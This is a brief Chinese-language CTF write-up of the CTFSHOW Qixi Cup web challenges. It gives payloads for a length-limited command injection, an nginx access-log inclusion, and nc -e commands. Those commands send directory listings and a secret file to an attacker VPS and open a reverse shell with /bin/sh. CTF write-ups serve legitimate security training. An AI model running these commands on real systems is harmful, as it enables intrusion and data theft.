CTFSHOW七夕杯web

Posted yu22x

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了CTFSHOW七夕杯web相关的知识,希望对你有一定的参考价值。

文章目录

web签到

有长度限制
payload

ls />a
nl /*>a

然后访问a即可得到flag

easy_cmd

payload

num1=1;include "/var/log/nginx/access.log";&symbol=-&num2=3

然后就是日志包含那一套

easy_cmd

通过nc -e向自己的vps传递命令

nc x.x.x.x port -e ls /
nc x.x.x.x port -e cat /secert

也可以直接反弹个shell

nc x.x.x.x port -e /bin/sh

easy_sql

还在看
🌚

以上是关于CTFSHOW七夕杯web的主要内容,如果未能解决你的问题,请参考以下文章

CTFSHOW七夕杯web

ctfshow 大牛杯web

CTFSHOW 新生杯web

CTFSHOW 新生杯web

CTFSHOW 新生杯web

ctfshow baby杯web